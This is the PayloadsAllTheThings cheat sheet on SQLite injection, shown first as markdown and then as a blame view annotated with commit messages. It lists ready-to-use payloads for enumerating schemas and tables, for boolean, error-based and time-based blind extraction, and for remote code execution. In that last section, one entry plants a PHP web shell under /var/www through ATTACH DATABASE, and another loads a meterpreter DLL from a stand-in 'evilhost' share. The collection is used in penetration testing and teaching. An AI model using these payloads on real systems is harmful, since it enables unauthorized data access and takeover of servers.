PayloadsAllTheThings/SQL Injection/SQLite Injection.md

# SQLite Injection

> SQLite Injection  is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues. 


## Summary

* [SQLite Comments](#sqlite-comments)
* [SQLite Version](#sqlite-version)
* [String Based - Extract Database Structure](#string-based---extract-database-structure)
* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name)
* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name)
* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables)
* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name)
* [Boolean - Extract Info](#boolean---extract-info)
* [Boolean - Error Based](#boolean---error-based)
* [Time Based](#time-based)
* [Remote Code Execution](#remote-code-execution)
    * [Attach Database](#attach-database)
    * [Load_extension](#load_extension)
* [References](#references)


## SQLite Comments

```sql
--
/**/
```

## SQLite Version

```sql
select sqlite_version();
```


## String Based - Extract Database Structure

```sql
SELECT sql FROM sqlite_schema
```
if sqlite_version > 3.33.0 
```sql
SELECT sql FROM sqlite_master
```


## Integer/String Based - Extract Table Name

```sql
SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'
```


## Integer/String Based - Extract Column Name

```sql
SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'
```

For a clean output

```sql
SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'
```

Cleaner output

```sql
SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');
```


## Boolean - Count Number Of Tables

```sql
and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table
```

## Boolean - Enumerating Table Name

```sql
and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number
```

## Boolean - Extract Info

```sql
and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')
```

### Boolean - Extract Info (order by)

```sql
CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END
```

## Boolean - Error Based

```sql
AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END
```

## Time Based

```sql
AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))
```


## Remote Code Execution

### Attach Database

```sql
ATTACH DATABASE '/var/www/lol.php' AS lol;
CREATE TABLE lol.pwn (dataz text);
INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--
```

### Load_extension

```sql
UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--
```

Note: By default this component is disabled.


## References

* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)
* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)
* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`# SQLite Injection`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`> SQLite Injection is a type of security vulnerability that occurs when an attacker can insert or "inject" malicious SQL code into SQL queries executed by an SQLite database. This vulnerability arises when user inputs are integrated into SQL statements without proper sanitization or parameterization, allowing attackers to manipulate the query logic. Such injections can lead to unauthorized data access, data manipulation, and other severe security issues.`


Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`## Summary`

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`* [SQLite Comments](#sqlite-comments)`
			`* [SQLite Version](#sqlite-version)`
			`* [String Based - Extract Database Structure](#string-based---extract-database-structure)`
			`* [Integer/String Based - Extract Table Name](#integerstring-based---extract-table-name)`
			`* [Integer/String Based - Extract Column Name](#integerstring-based---extract-column-name)`
			`* [Boolean - Count Number Of Tables](#boolean---count-number-of-tables)`
			`* [Boolean - Enumerating Table Name](#boolean---enumerating-table-name)`
			`* [Boolean - Extract Info](#boolean---extract-info)`
			`* [Boolean - Error Based](#boolean---error-based)`
			`* [Time Based](#time-based)`
References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`* [Remote Code Execution](#remote-code-execution)`
			`* [Attach Database](#attach-database)`
			`* [Load_extension](#load_extension)`
Added Summary in SQLite Injection 2019-10-29 13:52:49 +00:00			`* [References](#references)`
SQL injections references updates 2024-11-03 13:06:53 +00:00

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## SQLite Comments`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`--`
			`/**/`
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			```
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## SQLite Version`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`select sqlite_version();`
			```
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
			`## String Based - Extract Database Structure`
SQLite Injection add extract database structure 2021-12-07 06:51:27 +00:00
			```sql
			`SELECT sql FROM sqlite_schema`
			```
Update SQLite Injection.md Since sqlite version 3.33.0, sqlite_schema has been replaced by sqlite_master. 2024-04-01 17:46:09 +00:00			`if sqlite_version > 3.33.0`
			```sql
			`SELECT sql FROM sqlite_master`
			```
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00

			`## Integer/String Based - Extract Table Name`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Update SQLite Injection.md add "group_concat" so that all tables can be extracted once when the query only returns the first item 2023-07-16 15:44:00 +00:00			`SELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%'`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
			`## Integer/String Based - Extract Column Name`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Remove unnecessary condition to extract columns Since we retrieve only the rows with a specific table name `name ='table_name', the table name won't start with `sqlite_` . Thus, we can remove the unnecessary condition. 2020-11-18 00:59:11 +00:00			`SELECT sql FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name ='table_name'`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			```

			`For a clean output`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`SELECT replace(replace(replace(replace(replace(replace(replace(replace(replace(replace(substr((substr(sql,instr(sql,'(')%2b1)),instr((substr(sql,instr(sql,'(')%2b1)),'')),"TEXT",''),"INTEGER",''),"AUTOINCREMENT",''),"PRIMARY KEY",''),"UNIQUE",''),"NUMERIC",''),"REAL",''),"BLOB",''),"NOT NULL",''),",",'~~') FROM sqlite_master WHERE type!='meta' AND sql NOT NULL AND name NOT LIKE 'sqlite_%' AND name ='table_name'`
			```

Update SQLite Injection.md Column names of the specified table can be more easily extracted in a better output. Tested during the CTF 2023-08-25 10:24:52 +00:00			`Cleaner output`

			```sql
			`SELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('table_name');`
			```

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00
			`## Boolean - Count Number Of Tables`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`and (SELECT count(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' ) < number_of_table`
			```

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## Boolean - Enumerating Table Name`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`and (SELECT length(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name not like 'sqlite_%' limit 1 offset 0)=table_name_length_number`
			```

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## Boolean - Extract Info`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00			`and (SELECT hex(substr(tbl_name,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) > hex('some_char')`
			```

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`### Boolean - Extract Info (order by)`
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00
			```sql
			`CASE WHEN (SELECT hex(substr(sql,1,1)) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%' limit 1 offset 0) = hex('some_char') THEN <order_element_1> ELSE <order_element_2> END`
			```

Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## Boolean - Error Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00			`AND CASE WHEN [BOOLEAN_QUERY] THEN 1 ELSE load_extension(1) END`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
Boolean - Extract info (order by) 2022-08-13 04:22:54 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`## Time Based`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
			`AND [RANDNUM]=LIKE('ABCDEFG',UPPER(HEX(RANDOMBLOB([SLEEPTIME]00000000/2))))`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00
Update SQLite Injection.md 2022-09-07 12:02:38 +00:00
References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`## Remote Code Execution`

			`### Attach Database`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQLmap tips + Active Directory attacks + SQLite injections 2018-03-12 08:17:31 +00:00			`ATTACH DATABASE '/var/www/lol.php' AS lol;`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`CREATE TABLE lol.pwn (dataz text);`
Single quotes are messing with the command. 2022-05-15 11:53:50 +00:00			`INSERT INTO lol.pwn (dataz) VALUES ("<?php system($_GET['cmd']); ?>");--`
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			```

References addded for SQLi, Upload, SSTI, Type Juggling 2024-11-07 19:54:16 +00:00			`### Load_extension`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL Cheatsheets - Refactoring part 1 2018-05-16 21:33:14 +00:00			```sql
SQL injections payloads separated + OAuth 2016-11-29 16:27:35 +00:00			`UNION SELECT 1,load_extension('\\evilhost\evilshare\meterpreter.dll','DllMain');--`
			```
Markdown formatting update 2018-08-12 21:30:22 +00:00
Normalize page header for SQLi, Upload, Cache Deception 2024-11-10 19:49:52 +00:00			`Note: By default this component is disabled.`
SQLite injection update-Extract table/column name 2017-02-21 08:16:51 +00:00
SQL injections references updates 2024-11-03 13:06:53 +00:00
Adding references sectio 2018-12-24 14:02:50 +00:00			`## References`
Markdown formatting update 2018-08-12 21:30:22 +00:00
SQL injections references updates 2024-11-03 13:06:53 +00:00			`* [Injecting SQLite database based application - Manish Kishan Tanwar - February 14, 2017](https://www.exploit-db.com/docs/english/41397-injecting-sqlite-database-based-applications.pdf)`
			`* [SQLite Error Based Injection for Enumeration - Rio Asmara Suryadi - February 6, 2021](https://rioasmara.com/2021/02/06/sqlite-error-based-injection-for-enumeration/)`
			`* [SQLite3 Injection Cheat sheet - Nickosaurus Hax - May 31, 2012](https://sites.google.com/site/0x7674/home/sqlite3injectioncheatsheet)`